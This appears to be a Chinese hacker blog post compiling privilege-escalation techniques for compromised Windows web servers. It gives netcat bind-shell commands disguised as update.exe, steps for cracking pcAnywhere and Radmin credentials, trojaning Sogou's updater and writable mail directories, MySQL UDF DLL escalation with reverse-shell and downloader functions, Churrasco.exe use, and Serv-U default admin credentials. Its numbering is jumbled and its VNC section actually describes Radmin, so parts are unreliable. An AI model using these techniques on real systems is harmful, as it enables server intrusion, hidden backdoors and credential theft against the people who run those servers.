比较有效的提权方法部分转载并持续更新

No.10 Vnc
Vnc不少老外都在用，国内用的比较少，但是几率很大。
==============
VNC漏洞

HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter//默认密码注册表位置
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Port //默认端口注册表位置

以前我们可以用asp木马所带的功能来读出键值,然后进行转换得到hash值,但是现在有个更方便的东西,把ASP文件传到服务器上,打开可直接读出Radmin的hash和Radmin服务端口!
 

No.8 PcAnywhere
PcAnywhere是一款用得很多的远程管理软件，他有一个重大是保存远程管理员帐号的CIF文件密码，是可以被轻易解密的，如果我们拿到一台主机的WEBSEHLL。通过查找发现其上安装有PCANYWHERE 同时保存密码文件的目录是允许我们的IUSER权限访问，我们可以下载这个CIF文件到本地破解，再通过PCANYWHERE从本机登陆服务器。思路简单而明确。
Ps:保存密码的CIF文件,不是位于PCANYWHERE的安装目录,而且位于安装PCANYWHERE所安装盘的\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 如果PCANYWHERE安装在D:\program\文件下下，那么PCANYWHERE的密码文件就保存在D:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\文件夹下。

No.7 搜狗输入法
不少管理都使用五笔打字，不过还是有少数人喜欢用拼音，智能ABC功能少，没有全拼功能，所以大多都选择了搜狗输入法。
搜狗输入法根目录下有一个：PinyinUp.exe 是用来更新词典用的，管理员为了保存词库，有可能会把搜狗输入法安装到D盘，搜狗输入法目录默认是Everyone可读可写，直接捆绑上远控等下次重启就会上线了。

No.6 WinWebMail企业邮局系统 7i24.com
WinWebMail目录下的web必须设置everyone权限可读可写，不然邮件登陆不上去等等，所以在开始程序里找到WinWebMail快捷方式下下来，看路径，访问 路径\web传shell，访问shell后，权限是system，放远控进启动项，等待下次重启。没有删cmd组建的直接加用户。
7i24的web目录也是可写，权限为administrator。

No.5 NC反弹
nc的使用实例

c:\nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隐藏一个NetCat后门。
c:\nc.exe -p 4455 -d -L -e cmd.exe 这个命令可以让黑客利用NetCat重新返回系统，直到系统管理员在任务管理器中看见nc.exe在运行，从而发现这个后门，我们一样可以把它做的更加隐蔽。
c:\move nc.exe c:\windows\system32\Drivers\update.exe
c:\windows\systeme32\drivers\update.exe -p 4455 -d -L -e cmd.exe
系统管理员可能把特权附属于一些无害的程序，如update.exe等，黑客也可以隐藏命令行。
c:\windows\systme32\drivers\update.exe
cmd line: -l -p 4455 -d -L -e cmd.exe

c:\>
nc -l – p 80  监听80端口
nc -l -p 80 >c:\log.dat  监听80端口，并把信息记录到log.dat中
nc -v -l -p 80  监听80端口，并显示端口信息
nc -vv -l -p 80 监听80端口，显示更详细的端口信息
nc -l -p 80 -t -e cmd.exe监听本地的80端口的入站信息，同时将cmd.exe重定向到80端口，当有人连接的时候，就让

cmd.exe以telnet的形式应答。当然这个最好用在控制的肉鸡上。
nc -v ip port 扫瞄某IP的某个端口
nc -v -z ip port-port扫描某IP的端口到某端口
nc -v -z -u ip  port-port扫描某IP的某UDP端口到某UDP端口

No.4 mssql(sa) mysql(root)，asp木马自带连接执行组建
sa 1433对外关闭的话，可以构建注入点。（没试过构造--#）
<%
strSQLServerName = “服务器ip”
strSQLDBUserName = “数据库帐号”
strSQLDBPassword = “数据库密码”
strSQLDBName = “数据库名称”
Set cOnn= Server.createObject(“ADODB.Connection”)
strCon = “Provider=SQLOLEDB.1;Persist Security Info=False;Server=” & strSQLServerName & “;User ID=” & strSQLDBUserName & “;Password=” & strSQLDBPassword & “;Database=” & strSQLDBName & “;”
conn.open strCon
dim rs,strSQL,id
set rs=server.createobject(“ADODB.recordset”)
id = request(“id”)
strSQL = “select * from ACTLIST where worldid=” & idrs.open strSQL,conn,1,3
rs.close

No.7 root su.PHP配合udf.dll提权   (效果很明显! 用孤水绕城写的那个phpudf 如果是root并且支持外联hehe..)
第一步：将PHP文件上传到目标机上，填入你的MYSQL账号经行连接。
第二步：连接成功后，导出DLL文件，导出时请勿必注意导出路径（一般情况下对任何目录可写，无需考虑权限问题）。
                对于MYSQL5.0以上版本，你必须 将DLL导出到目标机器的系统目录(win 或 system32)，否则在下一步操作中你会看到”No paths allowed for shared library”错误。
第三步：使用SQL语句创建功能函数。语法：Create Function 函数名（函数名只能为下面列表中的其中之一） returns string soname ‘导出的DLL路径’；
                对于MYSQL5.0以上版本，语句中的DLL不允许带全路径，如果你在第二步中已将DLL导出到系统目录，那么你就可以省略路径 而使命令正常执行，否则你将会看到”Can’t open shared library”错误。
                这时你必须将DLL重新导出到系统目录。
第四步：正确创建功能函数后，你就可以用SQL语句来使用这些功能了。语法：select 创建的函数名(‘参数列表’)； 每个函数有不同的参数，你可以使用select 创建的函数名(‘help’)；来获得指定函数的参数列表信息。
udf.dll功能函数说明：
cmdshell 执行cmd;
   downloader 下载者,到网上下载指定文件并保存到指定目录;
   open3389 通用开3389终端服务,可指定端口(不改端口无需重启);
   backshell 反弹Shell;
 &nb
sp; ProcessView 枚举系统进程;
   KillProcess 终止指定进程;
   regread 读注册表;
   regwrite 写注册表;
   shut 关机,注销,重启;
   about 说明与帮助函数;
 

No.3 03Oday  （好用）
03系统 传cmd 执行命令
使用方法:Churrasco.exe “命令”

支持aspx的话执行概率比较大，NC反弹低权限cmdshell 在执行也可以试试。

No.2 Serv-u （这个提权需要看版本了 具体情况具体分析。。）
漏洞是使用Serv-u本地默认管理端口，以默认管理员登陆新建域和用户来执行命令，Serv-u>3.x版本默认本地管理端口是：43958，默认管理员：LocalAdministrator，默认密码：#l@$ak#.lk;0@P，这是集成在Serv-u内部的，可以以Guest权限来进行连接，对Serv-u进行管理

No.3 迅雷提权

替换服务！

如果不支持组建,改名\删除？是内网？如果可执行命令，net net1...禁用但是加不了用户，开不了3389，。。。问题都是很多的！

代理嗅探,god,rootkit,都是可以的  呵呵,最近喜欢爆破。。意外的收获是颇丰的。